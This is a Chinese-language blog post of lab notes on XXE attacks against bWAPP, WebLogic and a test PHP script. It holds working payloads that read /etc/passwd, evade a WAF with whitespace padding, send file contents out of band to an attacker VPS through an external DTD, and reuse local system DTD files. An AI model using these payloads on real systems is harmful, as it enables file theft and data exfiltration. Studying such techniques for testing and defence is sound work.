---
title: XXE深入学习
date: 2020-01-17
tags:
  - XXE
categories: Web
---

使用了bwapp和Weblogic进行了简单的XXE测试，上传导致XXE始终没找到实例Orz

### 绕过WAF

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard.png)

这是一个正常的请求，但是当我们进行恶意输入例如

```xml
<?xml  version="1.0"  encoding="UTF-8" ?>
<!DOCTYPE msg [
	<!ELEMENT msg ANY>
	<!ENTITY attack SYSTEM "file:///etc/passwd">
]>
<reset><login>&attack;</login><secret>Any bugs?</secret></reset>
```

这个时候就会读取到系统中的文件![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205141555.png)

Ok，这是不存在WAF的情况，但若存在WAF，肯定无法现在这样轻易读取到文件内容了，那么就可以采用如下方式进行尝试

#### **添加空格**

在原来的空格处增加n个空格，只要空格足够多，WAF就可能跳过检测一定长度后的内容

```xml
<?xml       [空格*n]      version="1.0"  encoding="UTF-8" ?>
<!DOCTYPE msg [
	<!ELEMENT msg ANY>
	<!ENTITY attack SYSTEM "file:///etc/passwd">
]>
<reset><login>&attack;</login><secret>Any bugs?</secret></reset>
```



大概就是这样子

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205200805.png)

#### **引入外部实体文件**

一般情况下WAF会允许引入外部实体文件，而且不会对其进行检测(如果检测了会不会导致对WAF的SSRF呢？)这样子我们就可以在自己的VPS上构建恶意dtd文件，通过引入恶意文件达成攻击效果

发送请求

```xml
<?xml  version="1.0"  encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://192.168.156.1:8000/xxe.dtd">
<reset><login>&attack;</login><secret>Any bugs?</secret></reset>
```



其中xxe.dtd内容为

```xml
<!ENTITY % d SYSTEM "file:///etc/passwd" >
<!ENTITY % attack "<!ENTITY &#x25; rrr SYSTEM 'http://192.168.156.1:8000/?%d;'>" >
%attack;
%rrr;
```



![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205230957.png)

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205256354.png)

由于不明原因在bee的环境下始终无法成功，最后换了CVE-2018-3246才可以，🤮

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205262752.png)

本来以为是libxml,libxml在2.9.1后不能使用外部实体，然而

![img](深入学习XXE/clipboard-1579205271409.png)

在本机做下测试

```php
<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents("php://input");
$xml = simplexml_load_string($xmlfile);
```



```xml
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://localhost:8000/xxe.dtd">
%ext;
]>
<message></message>
```



完全可行

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205324460.png)

头秃Orz

之后看到了一种据说可以通过本地DTD文件来进行攻击的方法，即不使用外部实体，而是在目标机器上寻找可以利用的DTD文件，而在相同的系统中，一般都存在着相同的文件，首先在本地测试了下

先将上文中

```xml
libxml_disable_entity_loader(false);
```



设置为true,这个时候有意思的就来了，无论有没有包含本地内容，都会有如下错误

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205340203.png)

Orz，姑且将其设置为False，来看看Payload可否正常运行

因为是Windows所以采用了

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205346594.png)

这种Payload

略微修改后就是这样子

```xml
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///C:/Windows/System32/wbem/xml/cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "file:///c:/Temp/1.txt">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http:///localhost:8000/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<message>any text</message>
```

但是现实是残酷的

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205367604.png)

并没有成功，既然PHP不行，换成其它的会怎样呢？回到上文中利用过的weblogic，先找一个本地DTD

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205387653.png)

挨个看了下后发现

/u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd

其中的Location最适合用来利用

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205397891.png)

构造如下Payload

```xml
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:////u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd">
<!ENTITY % Location 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://VPS:8000/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message></message>
```



成功利用

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205411473.png)

为了验证下究竟是不是php本身的原因，将上述dtd文件中的

```xml
<!ENTITY % Location "#PCDATA"> 
<!ELEMENT large-icon     (%Location;)>
```



提取出来放到本地进行测试

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205431737.png)

同样的Payload依旧失败了Orz

看了看时间再摸一摸不多的头发 😭 先到这里吧 后续补充

![img](https://wiki-1258274765.cos.ap-nanjing.myqcloud.com/wiki/imgclipboard-1579205151573.png)



参考链接:

https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

https://lab.wallarm.com/xxe-that-can-bypass-waf-protection-98f679452ce0/

